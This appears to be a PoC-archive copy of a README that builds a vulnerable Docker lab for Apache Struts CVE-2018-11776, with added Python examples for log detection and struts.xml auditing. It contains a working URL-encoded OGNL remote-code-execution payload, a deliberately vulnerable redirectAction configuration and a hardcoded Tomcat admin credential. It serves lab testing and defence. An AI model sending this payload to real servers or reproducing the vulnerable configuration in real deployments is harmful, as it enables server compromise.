PoC details: 09e268759acea479b944a89d5181615dc7b62c0e

Source
Related vulnerability
Title: Apache Struts input validation error vulnerability (CVE-2018-11776)
Description: Apache Struts is an open-source project maintained by the Apache Software Foundation (USA). It is an open-source MVC framework for building enterprise-grade Java web applications and is offered mainly as two framework products, Struts 1 and Struts 2. Apache Struts 2 is the next-generation Struts product, a new framework that merges the technology of Struts 1 and WebWork, and its architecture differs considerably from Struts 1. An input validation vulnerability exists in Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16.
Description
Vulnerable docker container for CVE-2018-11776
Introduction
## Vulnerable docker container for CVE-2018-11776

    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

### PoC

##### PoC - 1
   
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
    
##### PoC - 2

    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : This creates a file named 'vulnerable' in the /tmp/ directory of the container
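
As an added example that is not part of the original README or the bhdresh container, the following Python script (function names find_ognl_in_path and decode_path are assumed; the log lines are constructed, not captured traffic) shows what the two PoC requests above look like in a Tomcat or Apache access log and how a defender can flag them. The injected expression travels in the URL path segment in front of the action, so the check URL-decodes the path and looks for the OGNL openers `${` and `%{` in any segment; it also records high-risk tokens such as `#_memberAccess` from the PoC-2 payload, and it does not flag the `666` redirect target that PoC-1 produces.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Tomcat combined-style access-log format (not real traffic).
# Line 2 mirrors PoC-1, line 3 mirrors PoC-2 with the body of the expression elided to "...",
# and line 4 is the redirect target PoC-1 produces, which must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Aug/2018:10:01:02 +0000] "GET /struts2-showcase-2.3.14/showcase.jsp HTTP/1.1" 200 4312
10.0.0.9 - - [22/Aug/2018:10:01:10 +0000] "GET /struts2-showcase-2.3.14/${333+333}/help.action HTTP/1.1" 302 0
10.0.0.9 - - [22/Aug/2018:10:01:15 +0000] "GET /struts2-showcase-2.3.14/%24%7B%28%23_memberAccess...%29%7D/help.action HTTP/1.1" 302 0
10.0.0.9 - - [22/Aug/2018:10:01:20 +0000] "GET /struts2-showcase-2.3.14/666/help.action HTTP/1.1" 302 0
"""

# Common/combined log prefix: client, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# OGNL expression openers that Struts evaluates in result parameters: "${" and "%{".
OGNL_MARKER = re.compile(r'[$%]\{')

# Substrings from the PoC-2 payload that indicate an execution attempt rather than a probe.
HIGH_RISK_TOKENS = ('#_memberAccess', '@java.lang.Runtime@', 'getRuntime', '.exec(')


def decode_path(raw_path: str) -> str:
    """URL-decode the path, repeating while another encoding layer remains (at most 3 rounds),
    so that a double-encoded probe still surfaces its markers."""
    current = raw_path
    for _ in range(3):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_ognl_in_path(log_text: str) -> list[dict]:
    """Return one finding per request whose URL path (query string excluded) carries an OGNL
    opener in any segment, with the requested action and any high-risk tokens seen."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        path = m.group('target').split('?', 1)[0]
        decoded = decode_path(path)
        segments = [s for s in decoded.split('/') if s]
        hits = [s for s in segments if OGNL_MARKER.search(s)]
        if not hits:
            continue
        findings.append({
            'ip': m.group('ip'),
            'timestamp': m.group('ts'),
            'status': int(m.group('status')),
            'action': segments[-1],
            'ognl_segments': hits,
            'high_risk_tokens': [t for t in HIGH_RISK_TOKENS if t in decoded],
        })
    return findings


if __name__ == '__main__':
    for finding in find_ognl_in_path(SAMPLE_LOG):
        print(finding)
```

Run against real logs, the same function works on any file in common or combined format; a 302 for an OGNL-bearing request is the signature of the redirectAction path the README sets up, while the `666` segment on the follow-up request is only the evaluated result and carries no marker.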
    
    
## Steps to create vulnerable docker container

##### Create a Dockerfile

    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080


##### Build the Docker image

    # docker build -t cve-2018-11776 .


##### Start the container

    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash

##### Log in to the container

    # docker exec -it cve-2018-11776 /bin/bash

##### Make the following changes inside the container

###### Set up Tomcat:

    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat

###### Update bashrc with variables:

    # vim ~/.bashrc
    
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    
    # . ~/.bashrc

###### Add an admin user to the Tomcat GUI:

    # vim /opt/tomcat/conf/tomcat-users.xml
    
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />

###### Start Tomcat server

    # $CATALINA_HOME/bin/startup.sh

###### Upload and deploy a vulnerable Struts2 Showcase through the Tomcat UI

    http://<IP ADDRESS>:8080 (log in with the user from tomcat-users.xml: username "username", password "test-cve-2018-11776")

###### Restart Tomcat

    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh


###### Add a vulnerable redirection action without a namespace:

    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

      <action name="help">
          <result type="redirectAction">
              <param name="actionName">date.action</param>
          </result>
      </action>

    NOTE: By default, alwaysSelectFullNamespace should already be set to true; the namespace-less action above relies on it.
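
The snippet above recreates the configuration condition the CVE needs: alwaysSelectFullNamespace enabled together with an action whose redirectAction result names no namespace. As an added example (not part of the README or the Showcase application), the following Python audit, with the assumed function name audit_struts_xml and two constructed struts.xml fragments, checks a struts.xml for that combination and shows the hardened counterpart beside it: the constant set to false, a namespace on the package, and an explicit namespace param on the result. Upgrading to a fixed Struts release remains the actual fix; the configuration changes are a mitigation, and the audit only reads constants declared in struts.xml, not struts.properties.

```python
import xml.etree.ElementTree as ET

CONSTANT = 'struts.mapper.alwaysSelectFullNamespace'

# Constructed struts.xml fragment reproducing the README's condition (DOCTYPE omitted so the
# parser needs no DTD): full-namespace selection on, and a namespace-less action whose
# redirectAction result also names no namespace.
VULNERABLE_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date.action</param>
      </result>
    </action>
  </package>
</struts>
"""

# Constructed hardened counterpart: the constant off, an explicit package namespace, and an
# explicit namespace param on the result, so nothing is taken from the request URL.
HARDENED_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="default" namespace="/" extends="struts-default">
    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date.action</param>
        <param name="namespace">/</param>
      </result>
    </action>
  </package>
</struts>
"""


def audit_struts_xml(xml_text: str) -> dict:
    """Report whether a struts.xml combines alwaysSelectFullNamespace=true with packages or
    redirectAction results that lack a namespace (the CVE-2018-11776 precondition)."""
    root = ET.fromstring(xml_text)
    full_ns = False
    for constant in root.iter('constant'):      # last declaration wins, as in Struts
        if constant.get('name') == CONSTANT:
            full_ns = constant.get('value', '').strip().lower() == 'true'
    issues = []
    for pkg in root.iter('package'):
        if pkg.get('namespace') is None:
            issues.append(f"package '{pkg.get('name', '?')}' declares no namespace")
        for action in pkg.findall('action'):
            for result in action.findall('result'):
                if result.get('type') != 'redirectAction':
                    continue
                params = {p.get('name'): (p.text or '').strip() for p in result.findall('param')}
                if not params.get('namespace'):
                    issues.append(f"action '{action.get('name')}': redirectAction result "
                                  f"has no namespace param")
    return {
        'alwaysSelectFullNamespace': full_ns,
        'issues': issues,
        # Only the combination lets a namespace supplied in the URL reach the result.
        'vulnerable_pattern': full_ns and bool(issues),
    }


if __name__ == '__main__':
    for label, xml_text in (('vulnerable', VULNERABLE_XML), ('hardened', HARDENED_XML)):
        print(label, audit_struts_xml(xml_text))
```

Point the function at the real `WEB-INF/classes/struts.xml` of a deployment (after stripping or ignoring its DOCTYPE) to confirm whether the pattern the README introduces is present; a result with `vulnerable_pattern` true is exactly the state the PoC URLs above exercise.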

###### Restart Tomcat and check out the Struts2 Showcase page:
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

### Author

@bhdresh

### References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057
File snapshot

    [4.0K] /data/pocs/09e268759acea479b944a89d5181615dc7b62c0e
    └── [3.2K] README.md

    0 directories, 1 file